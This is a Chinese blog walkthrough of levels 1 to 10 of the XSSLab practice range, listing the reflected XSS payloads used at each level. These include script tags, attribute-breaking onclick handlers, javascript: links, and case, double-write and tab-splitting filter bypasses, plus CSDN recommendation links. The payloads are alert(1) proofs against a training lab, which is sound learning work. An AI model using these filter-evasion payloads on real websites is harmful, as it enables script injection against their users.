XSSLab (1~10)

最新推荐文章于 2024-05-24 12:16:49 发布
最新推荐文章于 2024-05-24 12:16:49 发布
阅读量290 收藏
点赞数 1
分类专栏: Web安全 文章标签: php xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/124763902
版权

http://test.ctf8.com/level1.php?name=<script>alert(1)</script>

输入<script>alert(1)</script>
查看源码看到<input name=keyword value="<script>alert(1)<script>">
构造
" onclick="alert(1)

输入" onclick="alert(1)
查看源码看到<input name=keyword value='&quot; onclick=&quot;alert(1)'>
双引号进行了实体编码,并且这里是单引号闭合
构造
' onclick='alert(1)
单引号未被实体编码

查看源码得到
<input name=keyword value="">
构造
" onclick="alert(1)

查看源码得到
<input name=keyword value="find a way out!">

输入" onclick="alert(1)
查看源码看到<input name=keyword value="" o_nclick="alert(1)">
onclick变成了o_nclick

构造"><a href="javascript:alert(1)

查看源码得到<input name=keyword value="break it out!">
输入
"><a href="javascript:alert(1)
查看源码得到
<input name=keyword value=""><a hr_ef="javascript:alert(1)">

href变成了hr_ef
试试大小写绕过
"><a hrEf="javascript:alert(1)

输入"><a hrEf="javascript:alert(1)
<input name=keyword value=""><a ="java:alert(1)">
删除了script和href

双写绕过试试
构造
"><a hhrefref="javasscriptcript:alert(1)

在这里插入图片描述
输入框的内容会变成a的href
<a href="nice try!">友情链接</a>

输入javascript:alert(1)
查看源码得到
<a href="javascr_ipt:alert(1)">友情链接</a>
script变成scr_ipt

大小写绕过试试,会自动变成小写

使用TAB绕过(中间的是TAB)
javas cript:alert(1)

查看源码<a href="您的链接不合法?有没有!">

一般链接都是以http://开头

构造javasc ript:alert(/xss/);//http://

查看源码

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">

使用F12,修改一个输入框为
<input name="t_link" value="" type="text" onclick="alert(1)">

开心星人
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
test.ctf8 xss注入解题记录
qq_43623492的博客
04-02 4308
Level 1 页面没有文本框,但可以从URL下手 payload:test.ctf8.com/level1.php?name=<script>alert('ok')</script> Level 2 随便输入点什么,查看页面源码,发现我们输入的内容被困在了input的value属性内,那就闭合他们 payload:"><script>alert('ok...
跨站脚本xss-test靶场
tlucky的博客
04-14 614
靶场地址:url:http://test.ctf8.com/ Level 1 页面没有文本框,但可以从URL下手 payload:test.ctf8.com/level1.php?name= Level 2 随便输入点什么,查看页面源码,发现我们输入的内容被困在了input的value属性内,那就闭合他们 payload:"> Level 3 <>被转义,所以不能再用标签,那就给input加一个onfocus事件 payload:’ οnfοcus=alert(‘ok’)// Le
xss-labs(1~16)通关超详解
最新发布
2301_80031208的博客
05-24 1231
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
xss挑战之旅来重读xss(一)
Sp4rkW的博客
11-08 2428
在开始这篇文章之前,先简单聊几句: xss很多时候是鸡肋,比如说self-xss 很多厂商都会注明拒收反射xss,如58src 遇到请证明危害性的说法就走,人家的潜台词也是拒收反射xss 遇到收反射xss的,证明截图拿cookies能比alert弹个窗多很多money xss有时候也值很多钱,比如说某厂商的一个存储xss就给了3.5k 其实我们基本上都知道xss是什么,在给厂商提交漏洞的时候,...
XSS-LabXSS注入笔记1-16)
小谢的博客
10-29 4927
XSS-LabXSS注入笔记1-16)
xss-labs
Yb_140的博客
03-26 1535
xss-labs下载地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 目录 level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 level11 level12 level13 level14 level15 level16 level17 level18 level19 level20 level1 猜测使用GET传参,将name显示在
XSSlab靶场通关(1~20关)
06-10
适合刚开始学习xss漏洞,将xsslab靶场作为练习对象。
xss-lab全通关教程
05-07
XSS(Cross-Site Scripting)实验室全通关教程是一份深度学习和实践XSS漏洞攻防的宝贵资源。XSS是一种常见的网络安全问题,它允许攻击者在用户浏览器中注入恶意脚本,从而窃取敏感信息、操纵用户行为或进行其他危害...
xsslabs.zip
07-23
XSS实验室:深入理解与防范跨站脚本攻击》 XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本,从而控制用户的交互行为,窃取敏感信息。"xsslabs.zip" 是一个由国内...
WEB渗透学习-XSS-labs靶场
04-20
1. **反射型XSS(Non-Persistent XSS)**:这是最常见的一种XSS,攻击者的恶意脚本通过用户点击链接或者提交表单时的参数传递到服务器,再反射回用户的浏览器。在XSS-labs中,你可以通过构造特殊URL来触发这类XSS。 ...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器,当其他用户访问同一页面时,脚本将在用户的浏览器中执行。 2. **反射型XSS**:非持久性,恶意脚本通过URL参数传递,用户点击链接或者提交表单后,...
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9219
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 4575
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-LabXSS注入教程)
DMXA的博客
11-01 292
解题思路:先观察题目的类型,猜哪个地方可以存在注入,代码分析这个可以交给chatgpt,下面就可以尝试自己构造好的payload 做了10题下来,发现难度是依次上升的解题思路:先观察题目的类型,猜哪个地方可以存在注入,然后是代码分析,这个可以交给chatgpt,下面就可以尝试自己构造好的payload,也可以进行BP抓包看下具体数据,或者指纹识别查一下框架是否有历史漏洞, XSS常用的标签:
XSS-labs详解
ytdd66的博客
03-23 1921
进入靶场点击图片,开始我们的XSS之旅!
xss-lab靶场搭建+题目解答
NSQ0207的博客
07-25 177
在www目录下放入文件xss-lab
xss-lab靶场详解
LS_Sy的博客
03-22 971
pass1-pass4在中已经写过,便不再赘述。
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 4802
web靶场-xss-labs靶机平台的搭建和代码审计
[渗透测试笔记] 09.xss挑战之旅专题
H4ppyD0g的博客
02-13 553
网址:http://test.ctf8.com/ level1 通过修改url可以修改页面显示,判断是反射型xss,利用点在url。 payload test.ctf8.com/level1.php?name=<script>alert(1);</script> level2 输入信息在form的input里面,需要把input标签闭合 payload "/&...
XSS挑战之旅,学习笔记
qq_43573131的博客
11-28 730
因为我是边做边写博客,所以快捷目录就先不弄了,闲了再弄 最近把xss认真的好好过一边,于是先找了个早一点的题 xss挑战之旅嘿嘿 第一关: http://test.ctf8.com/level1.php?name=test 观察到通过get方式传参有会显, 直接打最简单的xss playload: <script>alert(1);</script> 第二关: http...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值